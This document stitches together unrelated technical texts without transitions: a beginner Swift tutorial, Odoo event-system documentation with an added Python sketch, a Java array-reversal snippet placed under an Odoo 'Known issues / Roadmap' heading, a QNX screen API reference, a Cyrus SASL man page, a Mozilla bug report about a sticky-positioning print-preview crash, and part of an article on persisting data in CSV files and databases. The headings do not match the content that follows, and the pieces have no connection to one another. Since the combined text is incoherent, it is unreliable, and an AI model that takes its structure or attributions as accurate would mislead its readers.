As said on the front of the Hitch Hiker’s Guide to the Galaxy, Don’t Panic! It’s time to learn some code, but it’s ok, we’ll take it easy to begin with, with some basics. Let’s start right at the beginning …
What exactly is code?
Code is the “programming language” you use in your apps to specify certain things. Things like — what happens when a button is pressed, what happens when an image is swiped to the left, what colour text to use, which font to use, how long it takes to do something … and much much more.
Why can’t we just use English?
Interesting question — as yet no-one has (to my knowledge) created a system where you can just use natural language to build apps. Each app platform / system / operating system has a programming language that’s been created to allow you to build apps using a specific set of commands. For iOS the main language used was Objective-C. A few years ago, Apple brought out Swift, a new, theoretically better language. You can still build apps in Objective-C, but this course will use Swift, as it’s the future! And round these parts, we’re all about The Future!
So, I need to learn a new language?
Sort of. A programming language isn’t like a natural language, like French or Irish; it’s really a set of commands, structures and concepts that can be used to do particular tasks.
Like a natural language however, you don't need to learn it all to begin to use it. A child can say “I don't want my dinner” years before she can say “Once matter passes a black hole's event horizon, it won't escape, not even light”.
Likewise, you can make basic iOS apps without becoming completely proficient in Swift or Objective-C. Over time, with more practice and learning, you can become more “fluent” in the language and create more complex apps.
Really, not even light will escape?
Nevermind that, focus! But yes …
Ok, back to the coding
We’ll go through some of the basics, then put them into action in Xcode to give them a bit more context.
Coding is generally made up of these basic blocks:
- Classes
- Variables
- Functions
There are way more things apart from those, but they’ll do for now.
Classes / Objects
A lot of programming languages, including Swift are “Object-Orientated” — this means it’s all about Objects; or as they’re otherwise called, Classes.
A Class is basically a way of describing a “thing” or an “object” — a thing that is in the app; a thing you can use or do something with or to. For example, each “Screen” in an iOS app is a “UIViewController” Class that can do various things — like displaying content like text, images or buttons.
Furthermore, each of those content items are themselves Classes; there is a UIButton Class for buttons, a UILabel Class for displaying text etc and many many many (many many) more classes to avail of and use.
“Behind” the screen, there are also Classes to use and manipulate data / content / other objects— such as the “String” class, which is used to store and manipulate natural language e.g. a name or a title.
Most of “learning to code” is learning about these Classes are and how they can be used.
There are two main sets of Classes to learn — the Swift ones and the iOS SDK ones. “SDK” means Software Development Kit — it’s a set of Classes and Functions (written in Swift) that Apple have pre-made to help you make apps. The UIViewController, UIButton and UILabel Classes mentioned above all come from the iOS SDK.
We’ll go through loads of these Classes through the various tutorials.
What’s the benefit of Objects / Classes?
Classes are a really handy way of doing things in code; they allow the definition of concepts in an understandable manner. What makes this even handier is that you can define your own Classes. If the app is about cars, you can create a Car Class. If it’s about airplane times, you can create an Airplane Class and maybe an Airport Class too, along with a Departure Class and an Arrival Class.
Classes also allow for re-use of code. If you have 10 names to display, you just need 10 instances of the one Class, not 10 different ones. If you have 7,853 airplanes, then you just need one Airplane Class.
Variables
Variables are how you use Classes. A variable is an “instance” of a Class, that you can use to store a value and re-use in your code. So:
var myName : String = "Odysseus"
This is actual Swift code to create (or “declare”) a variable, of type (Class) String and to “initialise” it with a value of “Odysseus”. (If you were cool enough to have a name like that).
var
is how you say variable
myName
is the name of the variable, and it could be anything, like:
var yourName
or
var whatever
would also be fine.
: String
says that the variable is of type / Class “String” and
= "Odysseus"
stores that value in the variable. If you then typed:
print(myName)
in your app in Xcode, and “ran” the app, you’d see “Odysseus” in the output area. (More on that later)
What is the “print” however?
This is a function — the next fundamental block of coding.
Functions
Functions are groups of code that “do” something. The print function above is a built-in function that you can use to print out values of variables to Xcode’s output area; this is handy when building apps so you can keep track of what’s going on.
Swift has many, many built-in functions — again, a lot of learning to code is learning what these are and how to use them.
You can (and will) also create your own functions. Here’s a simple function to add two numbers and “return” the result:
func addTwoNumbers(number1: Int, number2: Int)->Int{
return number1 + number2
}
The
func
says that this is a function.
addTwoNumbers
is the name. Again, we could have called this anything.
(number1 : Int, number2: Int)
is a bit more complicated. number1 and number2 are “parameters”. Parameters are values we can “pass in” to functions for use inside them. Here we say that there are two parameters in this function, both of Class “Int” — which is used to store numbers.
Again, “number1” and “number2” are the names of the parameters; we could have called them anything.
->Int
is how we specify that the function will “return” a value of Class Int.
{
is known as an “opening bracket” and signifies that the function’s code is about to begin. This code is what “runs” when the function is “called” i.e. “run”.
return number1 + number2
adds the two numbers together and “returns” the result. Returns means that this is the result of the function.
}
is the “closing bracket”. Every opening bracket must have a corresponding closing one. Or all hell breaks loose!
How would you use this amazing function?
var twoNumbersAdded = addTwoNumbers(number1: 10, number2: 10)
This creates a variable called “twoNumbersAdded” and stores in it the value 20 (the result of our function adding 10 and 10 together).
Cool? Confusing? It’s ok, all will become clearer with more examples and time!
A better example
Create an app in Xcode and open the ViewController.swift file.
The “viewDidLoad” and the “didReceiveMemoryWarning” are both functions. Note that neither has the “->” bit — this means they don’t return values; they just do their bit of code without returning a result.
Let’s create our own function and “call” it when the app is run. Before the final “closing bracket” in the file, type this:
func changeScreenColor(){
self.view.backgroundColor = UIColor.blue
}
This creates a function that will change the color of the main “view” in the ViewController. The “view” is actually an instance of UIView, another Class.
Now, in this function (which runs more or less immediately when the app is run):
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view, typically from a nib.
}
add this line, before the closing bracket:
changeScreenColor()
i.e.
This “calls” our function. Now run the app and you should see:
Yes! You just made something in an app change, using a function!
Let’s try out a couple more things. Add this new function which has a return type:
func getAwesomeName()->String{
return "Cohen the Barbarian"
}
and then add these lines to viewDidLoad to use the function:
let name : String = getAwesomeName()
print(name)
so the full code looks like:
import UIKit

class ViewController: UIViewController {

    override func viewDidLoad() {
        super.viewDidLoad()
        // Do any additional setup after loading the view, typically from a nib.
        changeScreenColor()
        let name : String = getAwesomeName()
        print(name)
    }

    override func didReceiveMemoryWarning() {
        super.didReceiveMemoryWarning()
        // Dispose of any resources that can be recreated.
    }

    func getAwesomeName()->String{
        return "Cohen the Barbarian"
    }

    func changeScreenColor(){
        self.view.backgroundColor = UIColor.blue
    }
}
Run the app and the output should be in Xcode:
Let’s add one more function, this time with parameters:
func getBalance(name: String)->Int{
if name == "Commander Vimes" {
return 100
}else{
return 200
}
}
and call it in viewDidLoad:
let balance = getBalance(name: "Granny Ogg")
print(balance)
Run the app and you should see:
The 200 is shown as the parameter we supplied was not equal to “Commander Vimes”. In fairness though, who would be?!
Summary
This post skimmed the tip of the iceberg of coding in Swift, but we all need to start somewhere. We’ll introduce more coding concepts gradually as we go along, so keep an eye out for the upcoming tutorials and guides!
This is part of appsandbiscuits — my new site to help teach app development to people with zero coding experience. If you liked it, please hit the little heart below, it’ll help other people come across the site! Thanks! Andy.
Usage
As a developer, you have access to an events system. You can find the documentation in the code or on
In a nutshell, you can create trigger events:
class Base(models.AbstractModel):
    _inherit = 'base'

    @api.model
    def create(self, vals):
        record = super(Base, self).create(vals)
        self._event('on_record_create').notify(record, fields=vals.keys())
        return record
And subscribe listeners to the events:
from odoo.addons.component.core import Component
from odoo.addons.component_event import skip_if


class MagentoListener(Component):
    _name = 'magento.event.listener'
    _inherit = 'base.connector.listener'

    @skip_if(lambda self, record, **kwargs: self.no_connector_export(record))
    def on_record_create(self, record, fields=None):
        """ Called when a record is created """
        record.with_delay().export_record(fields=fields)
This module triggers 3 events:
- on_record_create(record, fields=None)
- on_record_write(record, fields=None)
- on_record_unlink(record)
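In plain Python, with no Odoo dependency, the trigger/subscribe flow above can be sketched as follows. The EventBus class, the create() function, and the sample record are our own illustration, not part of the Odoo API:

```python
# Minimal event bus: listeners subscribe handlers to named events,
# and a "model" notifies the bus after creating a record.
class EventBus:
    def __init__(self):
        self._listeners = {}  # event name -> list of handler callables

    def subscribe(self, event, handler):
        self._listeners.setdefault(event, []).append(handler)

    def notify(self, event, *args, **kwargs):
        for handler in self._listeners.get(event, []):
            handler(*args, **kwargs)


bus = EventBus()
exported = []  # records the listener chose to act on


# A listener comparable in spirit to on_record_create above.
def on_record_create(record, fields=None):
    exported.append((record, sorted(fields or [])))


bus.subscribe('on_record_create', on_record_create)


# A create() that fires the event after the record is made.
def create(vals):
    record = dict(vals)
    bus.notify('on_record_create', record, fields=vals.keys())
    return record


rec = create({'name': 'widget', 'qty': 3})
```

Here notify() plays the role of self._event(...).notify(...), and subscribe() stands in for declaring a listener component.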
Known issues / Roadmap
To reverse an array, swap the first element with the last element, the second element with the second-to-last element, and so on. If the array is of odd length, leave the middle element as it is.
In short, swap the 1st element with the 1st element from the end, the 2nd element with the 2nd element from the end, i.e. the ith element with the ith element from the end. You need to do this until you reach the midpoint of the array.
If i is the index of an element from the start, (length of the array - i - 1) is the index of the matching element from the end. Therefore, swap array[i] with array[length of the array - i - 1] for each i from the start to the midpoint of the array:
import java.util.Arrays;

public class ReversingAnArray {
   public static void main(String[] args) {
      int[] myArray = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 };
      int size = myArray.length;

      for (int i = 0; i < size / 2; i++) {
         int temp = myArray[i];
         myArray[i] = myArray[size - 1 - i];
         myArray[size - 1 - i] = temp;
      }
      System.out.println("Array after reverse:: ");
      System.out.println(Arrays.toString(myArray));
   }
}
Array after reverse:: [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
Create a window group that other windows can join.
#include <screen/screen.h>
int screen_create_window_group(screen_window_t win, const char *name)
The handle of the window for which the group is created. This window must have been created with screen_create_window_type() with a type of SCREEN_APPLICATION_WINDOW or SCREEN_CHILD_WINDOW.
A unique string that will be used to identify the window group. Other than uniqueness, there are no other constraints on this name (for example, lower case and special characters are permitted). This string must be communicated to any window wishing to join the group as a child of win.
Function Type: Delayed Execution
This function creates a window group and assigns it to the specified window. The group is identified by the name string, which must be unique. The request will fail if another group was previously created with the same name.
Windows can parent only one group. Therefore, screen_create_window_group() can be called successfully only once for any given window. Additionally, only windows of certain types can parent a group of windows. Windows with a type of SCREEN_APPLICATION_WINDOW can parent windows of type SCREEN_CHILD_WINDOW and SCREEN_EMBEDDED_WINDOW. Windows with a type of SCREEN_CHILD_WINDOW can also create a group and parent windows of type SCREEN_EMBEDDED_WINDOW.
Once a group is created, it exists until the window that parents the group is destroyed. When a parent window is destroyed, all children are orphaned and made invisible. Destroying a child has no effect on the group other than removing the window from the group.
Group owners have privileged access to the windows that they parent. When windows join the group, the parent will receive a SCREEN_EVENT_CREATE that contains a handle to the child window that can be used by the parent to set properties or send events. Conversely, the parent gets notified when a child window gets destroyed. The parent window is expected to destroy its local copy of the window handle when one of its children is destroyed.
0 if request for the new window group was queued, or -1 if an error occurred (errno is set).
NAME
sasl_getopt_t - Cyrus SASL documentation
SYNOPSIS
#include <sasl/sasl.h>

int sasl_getopt_t(void *context,
                  const char *plugin_name,
                  const char *option,
                  const char **result,
                  unsigned *len);
DESCRIPTION
- context – is the SASL connection context
- plugin_name – is the plugin this value is for.
- option – is a string representing the option. A common option that all server applications should handle is
- result – the value of the option; it must remain valid until sasl_dispose(3) is called for the connection it is associated with, or sasl_done(3) is called for global callbacks.
RETURN VALUE
SASL callback functions should return SASL return codes. See sasl.h for a complete list. SASL_OK indicates success.
Other return codes indicate errors and should be handled.
SEE ALSO
RFC 4422, sasl(3), sasl_errors(3), sasl_callbacks(3)
AUTHOR
The Cyrus Team
1993-2021, The Cyrus Team
Closed Bug 1001994 Opened 8 years ago Closed 8 years ago
crash in libsystem_kernel.dylib@0x15866 on printing with position: sticky
Categories
(Core :: Layout, defect, P3)
Tracking
mozilla33
People
(Reporter: martijn.martijn, Assigned: MatsPalmgren_bugz)
References
Details
(4 keywords, Whiteboard: [adv-main33+])
Crash Data
Attachments
(6 files)
See testcase, which crashes on printing or print preview. This bug was filed from the Socorro interface and is report bp-44611da7-eede-4bd8-98e8-73db42140427.
=============================================================
0 libsystem_kernel.dylib libsystem_kernel.dylib@0x15866
1 libsystem_pthread.dylib libsystem_pthread.dylib@0x235c
2 libc++abi.dylib libc++abi.dylib@0x27726
3 libsystem_c.dylib libsystem_c.dylib@0x5cb1a
4 libc++abi.dylib libc++abi.dylib@0x27726
5 libc++abi.dylib libc++abi.dylib@0xf31
6 XUL nsStyleContext::~nsStyleContext() obj-firefox/x86_64/dist/include/nsCOMPtr.h
7 libc++abi.dylib libc++abi.dylib@0x25447
8 XUL nsLayoutUtils::GetNearestScrollableFrame(nsIFrame*, unsigned int) layout/generic/nsQueryFrame.h
9 XUL mozilla::StickyScrollContainer::GetStickyScrollContainerForFrame(nsIFrame*) layout/generic/StickyScrollContainer.cpp
10 XUL nsFrame::DestroyFrom(nsIFrame*) layout/generic/nsFrame.cpp
Priority: -- → P3
Summary: crash in libsystem_kernel.dylib@0x15866 on printing → crash in libsystem_kernel.dylib@0x15866 on printing with position: sticky
This, like bug 973971, happens while processing a C++ exception.
We actually don't support C++ exceptions, though they can still happen anyway. See bug 975158. We'd presumably crash on *any* C++ exception. And probably the only way to "fix" a bug like this is to avoid throwing the exception to begin with (to find out why it's being thrown).
Unfortunately I can't reproduce this crash. I tested with today's m-c nightly on OS X 10.7.5, 10.8.5 and 10.9.2.
atos translation of top part of stack from comment #0:
__pthread_kill (in libsystem_kernel.dylib) + 10
pthread_kill (in libsystem_pthread.dylib) + 92
char const* __cxxabiv1::(anonymous namespace)::parse_block_invoke<__cxxabiv1::(anonymous namespace)::Db>(char const*, char const*, __cxxabiv1::(anonymous namespace)::Db&)::test (in libc++abi.dylib) + 1129
abort (in libsystem_c.dylib) + 125
char const* __cxxabiv1::(anonymous namespace)::parse_block_invoke<__cxxabiv1::(anonymous namespace)::Db>(char const*, char const*, __cxxabiv1::(anonymous namespace)::Db&)::test (in libc++abi.dylib) + 1129
__cxa_bad_cast (in libc++abi.dylib) + 0
nsStyleContext::~nsStyleContext()
__cxa_deleted_virtual (in libc++abi.dylib) + 0
...
Group: core-security
It looks like we're calling a virtual method on a deallocated frame. STR: Print Preview the attached testcase, change the Scale between various % values a few times.
Corey, maybe you can take a look?
Flags: needinfo?(corey)
+cc: kip
I hadn't noticed that this was reproducible on Linux, but I can reproduce it per comment 5. What I see happening in the stack traces is: when destroying the sticky frame, we try to unregister it from its StickyScrollContainer. That requires first finding the scroll container frame, which I think in this document ought to be the nsHTMLScrollFrame corresponding to <html>, but I've no idea how that works in printing and gdb is being slightly uncooperative. Anyway, while walking up the frame tree in search of the scroll container, we hit that deallocated frame. I guess I would expect frame trees to be destroyed starting from the leaves, but maybe that doesn't hold here?
Flags: needinfo?(corey)
After removing some things from the file, I'm still able to reliably reproduce the crash by keyboard-scrolling through all the percentage scale options while print-previewing.
"Print Preview" is not a super-effective attack vector (sec-moderate?) but if we're screwing up the frame tree could it be made to happen in a non-print context? Often that seems to be the case, in which case this could be sec-critical. Jesse: do we hit position:sticky in you fuzzer often?
Flags: needinfo?(jruderman)
Yes, my fuzzer uses position:sticky all the time. But I've disabled testing of printing because my printing bugs never get fixed.
Flags: needinfo?(jruderman)
Can someone please take this issue and work on a patch?
Assignee: nobody → mats
The position:sticky frame is on an OverflowList of an inline, which may in some cases have a bogus parent frame pointer (because we reparent those lazily during reflow for performance reasons). But nsIFrame::DestroyFrom now depends on having a valid parent frame pointer chain to find the sticky controller:
The "if (overflowFrames)" check isn't needed but I think it's an optimization because it should rarely be non-null here. The eForDestroy value isn't strictly needed, since I could just pass zero and avoid the ReparentStyleContext part, but it's for documenting this case if more code is added here later that we could avoid for eForDestroy. This fixes the crash for me locally - I'll push to Try later after approval-to-land.
Attachment #8450605 - Flags: review?(roc)
Comment on attachment 8450553 [details] framedump + stack After debugging this a bit more I can see that the parent pointer we crash on is "Inline(span)(1)@7fffb9607550" (the first child of the "Block(ul)(1)@7fffb9606aa8"). So since that frame should have been destroyed normally, I'm a bit puzzled why it isn't poisoned...
OK, we're deleting the whole shell so we're not poisoning anything since it will free the whole arena soon anyway. So, the frame should be intact except for what the destructor does.
In both DEBUG and non-DEBUG builds on Linux64 I get the "pure virtual method called" which calls std::terminate() which raises an exception, which is fatal. Comment 1 to 4 sounds like the same happens on OSX. So those should be non-exploitable. I haven't tried Windows.
OS: Mac OS X → All
mozilla26 and later are affected. I don't know how to set "status-b2g-v*" because it's unclear to me what branches those are based on, ditto for status-seamonkey2.26.
status-b2g18: --- → unaffected
status-firefox30: --- → affected
status-firefox31: --- → affected
status-firefox32: --- → affected
status-firefox33: --- → affected
status-firefox-esr24: --- → unaffected
Keywords: regression
In a trunk DEBUG build on Windows I get "pure virtual function call" followed by a crash. FF30 on Windows does not crash at all.
Comment on attachment 8450605 [details] [diff] [review] fix [Security approval request comment] How easily could an exploit be constructed based on the patch? Not easily. Besides, it seems very unlikely to be exploitable anyway. I'm just asking for sec-approval in case I missed something above. Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? No. Which older supported branches are affected by this flaw? The bug affects mozilla26 and later. If not all supported branches, which bug introduced the flaw? bug 886646 Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? The same patch should apply, if needed. How likely is this patch to cause regressions; how much testing does it need? Unlikely to cause problems.
Comment on attachment 8450605 [details] [diff] [review] fix It is a sec-low so it doesn't need sec-approval to land. Only High and Critical security bugs do. Check it in!
Isn't it odd that we've completed reflow and there's still something on the overflow list?
(In reply to David Baron [:dbaron] (UTC-7) (needinfo? for questions) from comment #25) > Isn't it odd that we've completed reflow and there's still something on the > overflow list? Indeed it is; I'm aware of it and made a patch along those lines but I figured it wasn't the root cause of this bug and would only wallpaper it. Filed bug 1035299.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla33
Whiteboard: [adv-main33+]
Confirmed crash in Fx31 release. Verified fixed in Fx33, release candidate.
Status: RESOLVED → VERIFIED
Group: core-security → core-security-release
Group: core-security-release
Pushed by mpalmgren@mozilla.com: crashtest.
Flags: in-testsuite+ | https://bugzilla.mozilla.org/show_bug.cgi?id=1001994 | CC-MAIN-2022-05 | en | refinedweb |
In my code where I receive data from Reuters, I am giving a milliseconds of 500. So at intervals of 500 milliseconds, it reads the data. Are we missing any data if we increase the time?
@liyarthomas your code does not show the event dispatch and callback handler. Application has to receive data from EMA not poll it. If the ticks are not removed from EMA fast enough, then queue will fill up and application will run out of heap memory.
Hi @liyarthomas
Depending on the volatility of the instruments you are consuming and the service you are consuming from, there could well be much higher update rates.
Are you using streaming requests or snapshot requests?
Can you confirm what you mean by 'at intervals of 500ms it reads the data' - how exactly are you controlling this?
The event callback handlers in EMA (onRefreshMsg, onUpdateMsg etc) are event driven and called as & when any new updates arrive from the server - provided that you are continuously dispatching events.
Are you limiting the calls to dispatch() to once every 500ms? If so, any updates received from the server could start building up in a queue and your callbacks will only receive the next one in the queue as and when dispatch is called. If you do not call dispatch often enough for a instrument that updates more frequently - you may not get all the updates...
Please explain how your interval reading is working....
We are using an Asynchronous server here which reads the data store every 200 milliseconds and publishing it into the zero MQ.
The event callback handlers in EMA are event driven and are called as and when any new updates arrives from server.
I have attached here just two files which does the following. But I have not attached the event driven appclient.
So what we wanted to know is that, as we are reading the datastore every 200ms, are we missing any ticks?
using namespace thomsonreuters::ema::access; using namespace thomsonreuters::ema::rdm; using namespace std; int main(int argc, char* argv[]) { try { // instantiate callback client mdsdemo::DataStore ds; mdsdemo::AppClient client(ds); //ip, port, interval, datastore mdsdemo::AsyncServer as("*", 40000, 1000, ds ); cout << "Connecting to market data server" << endl; // create OMM consumer OmmConsumer consumer( OmmConsumerConfig() .host("159.220.108.133:14002") .username("NJ2_03_RHB_SWVPNTRIAL01") ); cout << "Subscribing to market data" << endl; std::vector<string> rics = { "USDEUR=R","JPYUSD=R","USDGBP=R","USDAUD=R","CHFUSD=R", "CADUSD=R" }; for (const auto ric : rics) { //first setup datastore for the ric ds.AddStorage(ric, new mdsdemo::FxData()); // subscribe to Level1 market data consumer.registerClient( ReqMsg() // default subscription domain is MMT_MARKET_PRICE .serviceName("hEDD") .name(ric.c_str()), client); } //run asynchronously reading the data store every 1000 milliseconds and publishing into the //queue as.RunForEver(); } catch (const OmmException& excp) { cout << "Exception subscribing to market data: " << excp << endl; } return 0; }
#include <sstream> #include <iostream> #include <boost/bind.hpp> #include "AsyncServer.h" using std::cout; using std::endl; namespace mdsdemo { AsyncServer::AsyncServer(string ip, int port, long interval, DataStore & ds) :context_(1), pub_(context_, ZMQ_PUB), interval_(interval), ds_(ds) { std::stringstream ss; ss << "tcp://" << ip << ":" << port; pub_.bind(ss.str()); } AsyncServer::~AsyncServer() { } void AsyncServer::RunForEver() { boost::asio::deadline_timer t(io_, boost::posix_time::millisec(interval_)); t.async_wait(boost::bind(&AsyncServer::OnTimer, this, boost::asio::placeholders::error, &t)); io_.run(); } void AsyncServer::Publish() { try { std::string jsonData = "full "; jsonData += ds_.ToJsonFull(); zmq::message_t msg(jsonData.begin(), jsonData.end()); pub_.send(msg); cout << jsonData << endl; } catch (const std::exception & exp) { //TODO log errors } } void AsyncServer::OnTimer(const boost::system::error_code& /*e*/, boost::asio::deadline_timer* t) { Publish(); t->expires_at(t->expires_at() + boost::posix_time::millisec(interval_)); t->async_wait(boost::bind(&AsyncServer::OnTimer, this, boost::asio::placeholders::error, t)); } }
(JAVA) Does using interestAfterRefresh(false) remove the need for deregistering items with Elektron?
EMA CPP - Exception adding ric into OmmArray
Login Domain - Components and Elements in Login responses
Elektron - EMA version upgrade
When can we expect Visual Studio 2017 C++ Libraries in Elektron SDK? | https://community.developers.refinitiv.com/questions/25192/regarding-data.html | CC-MAIN-2022-05 | en | refinedweb |
Take 35% off The Well-Grounded Python Developer by entering fccfarrell into the discount code box at manning.com.
This article is about persisting application data over time. You don’t run the applications you use forever, and despite the stability of computer systems, they are shut down and restarted periodically.
Imagine using a complex spreadsheet and re-entering all the data every time you shut the application or computer down. Even with the enormous processing power a computer has, it would hardly be a helpful device if there was no way to restore the information entered into it.
The Other Half
As a developer, it’s easy to think of the application code you’re creating as the primary product of your efforts. But, in reality, your cool, essential application with all of its well thought out code is only half the story. The other, equally important half is the data your application helps the user work with. Modifying, transforming and providing insights into data your users are interested in is the raw material an application works with.
Maintaining Information over Time
The other half of a computer system’s versatility is the file system. A file system saves data to a storage medium independent of electrical power. Most personal computer systems maintain file systems on either mechanical or solid-state drives. These storage devices have file system structures layered over them by the operating system of the computer.
Application programs give meaning to the data in a file. For example, when a photo viewing application opens a JPEG image file, the user sees a picture. The photo application can interpret the contents of the file and generate the expected visual results.
If a user were to open the same JPEG image file with a text editor, they would see a large block of largely incomprehensible data. Most of the files in a file system are like this, making sense to the applications that can read and interpret them.
Any application needs to save and recall content to display to users. The content saved to the file system is in a format understood by the application.
Accessing Data
Before diving directly into database systems, let’s talk about storing data in a file in general. To do so, we’ll use something everyone who’s bought anything online is familiar with, customer orders for products. Later, we’ll use this idea to illustrate some issues when storing data to file systems.
To begin with, imagine an online store that only sells a single product to many customers. Each customer might create multiple orders for that single product. To make the data relatively easy to present in this article, we’ll keep the amount of information very low, the customer’s name, their address, the product name, and the quantity in the order.
A common format for data in a file system is the comma-delimited value format or CSV. A CSV file is easy to understand and has the advantage of being human-readable and accessible by computer systems.
A CSV file is a simple text file where each line of text is a record of data ending in a carriage return. A comma character separates the data elements in each line of text. The first line of a CSV file often contains the names of each comma-separated field in the remainder of rows of text in the file.
That’s pretty much it, no concept of data type for each element in a record. An application reads the CSV file and splits each comma-separated line of text into fields of text data.
The imaginary company selling only one product to each customer could save all of the customer information and their orders in a single CSV file:
This CSV file is sufficient to represent the customers, orders, and address where to ship them. The first field contains the customer’s name, the second their address, the third their zip code, the fourth field is the product name, and the last field is the quantity of the products in the order. Because the company only sells a single product, this could work.
Even in this example, you might notice a potential problem. There’s redundant data in the file. For example, customers and their addresses are represented multiple times for each separate order, as in the case of Joe and Mary.
We could resolve the problem by removing the redundancy and having only one record for each customer, and representing multiple orders in that same record. You could create more comma-separated fields containing the quantities, but this doesn’t work. Because there’s no way to know how many orders a customer will create, it would be difficult for an application reading the CSV file to know how many fields to expect.
We could pack multiple product and quantity fields into the single order field, but we’d need to use a delimiter distinct from a comma to separate the values. So instead, we use the pipe “|” character to separate orders and the dash “-“ character to separate the product from the quantity. Doing this allows you to maintain multiple orders per record so that an application can still parse the lines of text in the file.
Implementing this idea creates a CSV file like this:
This implementation reduces the redundancy in the file as well as its size. Reducing the redundancy comes at the cost of increased processing when reading and interpreting the data in this CSV file. The application will have to parse for the comma, the pipe, and the dash symbol delimiters in the order field.
Suppose our imaginary company decides to sell multiple products, and customers can ship an order to any address they want. Now customer orders need to contain the shipping address information, which nees its own delimiters within the field to stay distinct.
We could extend the CSV file in this way:
Adding more delimiters could work, but it’s getting silly with multiple data items to parse in the orders field. This approach also doesn’t scale well as adding more products makes the orders field even more complicated.
Resolving this problem means recognizing the logical divisions between the data elements to be stored. For example, a customer can ship multiple orders to different shipping addresses, and each order can contain multiple products and quantities.
Each customer can have multiple orders, but each order is related to only a single customer. Similarly, each address can be related to multiple orders, but each order will ship to only a single address.
Orders and products are a little more challenging. An order can contain multiple products, and a product can be part of multiple orders. To resolve this, we invent the concept of an order item. An item relates to an order and a product, providing this two-way connection.
We can break the data into separate CSV files along these logical lines, essentially where we’ve added additional delimiters in the text. Taking this action creates five CSV files: customer, address, product, order, and item. The five CSV files separate the data along the logical lines. Unfortunately, there’s no way to connect a customer to an order, an order to an address, or an item to either an order or a product.
To connect the data, we need to create relationships between the rows of data in the files. We can do this by creating a unique identifying value for each row in every CSV file. At a minimum, the row identifier only needs to be unique across the rows in an individual CSV file.
We’ll add another column at the beginning of each row and assign an integer value incremented for each row. The integer value uniquely identifies each row of data in a CSV file, but there are still no relationships between the CSV files.
To create relationships, we add the unique identifier from one record in a CSV file to another to indicate the relationship between the two CSV files. For example, a single customer can create multiple orders, but each order only belongs to a single customer.
We’ll add the unique identifier as a new value to all the rows in the order CSV file that relate to that customer to create this relationship. This kind of relationship is called one-to-many; each customer is related to multiple orders, but each order relates to only a single customer.
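As a sketch, the one-to-many link can be modeled in Python by carrying the customer's unique id on each order row (the ids and names below are made up for illustration):

```python
# Customers keyed by their unique id; each order carries the id of the one
# customer it belongs to, giving a one-to-many relationship.
customers = {1: "Joe", 2: "Mary"}
orders = [
    {"id": 1, "customer_id": 1},
    {"id": 2, "customer_id": 1},
    {"id": 3, "customer_id": 2},
]


def orders_for(customer_id):
    """Return the ids of all orders belonging to one customer."""
    return [o["id"] for o in orders if o["customer_id"] == customer_id]


joes_orders = orders_for(1)
```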
There’s also another relationship we have to establish. Each order can consist of multiple products, and each product can relate to multiple orders. A relationship like this is called a many-to-many. Conceptually this is a many-to-one relationship combined with a one-to-many and is implemented by creating relationship associations.
To do this, we’ll create an item CSV file that contains the unique id’s from both the order and product CSV files for each item. In this way, an order can connect to multiple items and connect to multiple products.
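A small Python sketch of the many-to-many association through item rows (again with made-up ids):

```python
# Each item row associates one order with one product, so an order can hold
# many products and a product can appear on many orders.
products = {1: "widget", 2: "gadget"}
items = [
    {"order_id": 1, "product_id": 1, "qty": 2},
    {"order_id": 1, "product_id": 2, "qty": 1},
    {"order_id": 2, "product_id": 1, "qty": 4},
]


def products_in(order_id):
    """Resolve an order's items to (product name, quantity) pairs."""
    return [(products[i["product_id"]], i["qty"])
            for i in items if i["order_id"] == order_id]


order_1 = products_in(1)
```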
The five CSV files to represent the information is presented below:
The diagram shows the five CSV files, their contents, and the relationships between them. Each file has a unique id value as the first field in each row of data. The structure shows the Customer, Product, and Address files have no redundant data. It also shows the Order and Item files contain relationship data primarily, aside from the unique id and the qty value in Item.
Because of the structure and contents of the CSV files, our imaginary company could continue to add new customers, add new products to sell, and addresses to ship to, all without creating unsustainable redundant information. The example program in examples/01/main.py uses this information to create simple invoice PDF files for all the orders in the system. The diagram below shows invoice_1.pdf with indications for the source of the data shown:
I won’t present the example program here as it’s available in the book. The program works by reading all the CSV files into memory and creating a Transactions container class to hold the information. Next, the orders in the Transactions class are inserted into the transaction information fields in a Jinja2 template. The resulting rendered HTML is converted to a PDF file.
The above ideas and implementation work but have significant limitations. Because the CSV files are read into memory, the number of customers, products, and orders are limited to the amount of memory the application has available.
The example program has only one use, to create a set of order invoices for all the orders in the system. There is no facility to search for an order, customer or product. Any additional use cases, like searching or reporting our imaginary company might want, requires quite a bit more programming development.
Our imaginary company would likely want to have multiple users interacting with the data, both customers and employees. Coordinating multiple access has to be handled by the application so the data stays consistent and uncorrupted. If multiple applications access the CSV files, this presents another level of complexity to coordinate that access, keep the data synchronized and current in all applications and prevent the files from becoming corrupted.
There’s also no standardized way to use the CSV files. The CSV files are shared easily enough, but anyone wanting to use them would need detailed knowledge of the structure of the files and the relationships implied by that structure. They’d also have to maintain that structure if they wanted to modify the data contents. One solution to the problems is to move the data to a database system.
Database Systems
Database systems allow you to persist data as well as the relationships between that data. One common type of database is the Relational Database Management System or RDBMS. RDBMS systems provide the functionality to create, update and delete tables stored within them. These tables are analogous to the two-dimensional tables represented by the CSV files used in the example above.
RDBMS systems also have the functionality to create and update the relationships between tables by connecting the unique id values across table boundaries.
One of the advantages of a database system over using files to persist information is that creating, updating, and maintaining the data is handled by the database itself, along with all the knowledge necessary to maintain that data.
Tables
A database represents the data it maintains as tables. Conceptually, tables in a database are two-dimensional collections of rows and columns.
Like the CSV files presented previously, the rows are the individual records, and the columns are the fields within a row. Unlike a CSV file where the columns are strings separated by a delimiter, the columns in database tables have defined data types. The data types supported depend on the particular database, but data types of text, integer, real (decimal numbers), and blobs (binary objects) are generally supported.
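As an illustration, here is how such typed columns might be declared in SQLite using Python's built-in sqlite3 module. The price column is an invented example added to show the REAL type; it is not a column from the book's tables:

```python
import sqlite3

conn = sqlite3.connect(":memory:")  # throwaway in-memory database
conn.execute(
    """CREATE TABLE product (
           product_id INTEGER PRIMARY KEY,  -- integer type
           name TEXT,                       -- text type
           price REAL                       -- decimal numbers
       )"""
)
conn.execute("INSERT INTO product (name, price) VALUES (?, ?)", ("widget", 1.25))
row = conn.execute("SELECT name, price FROM product").fetchone()
print(row)  # ('widget', 1.25)
```

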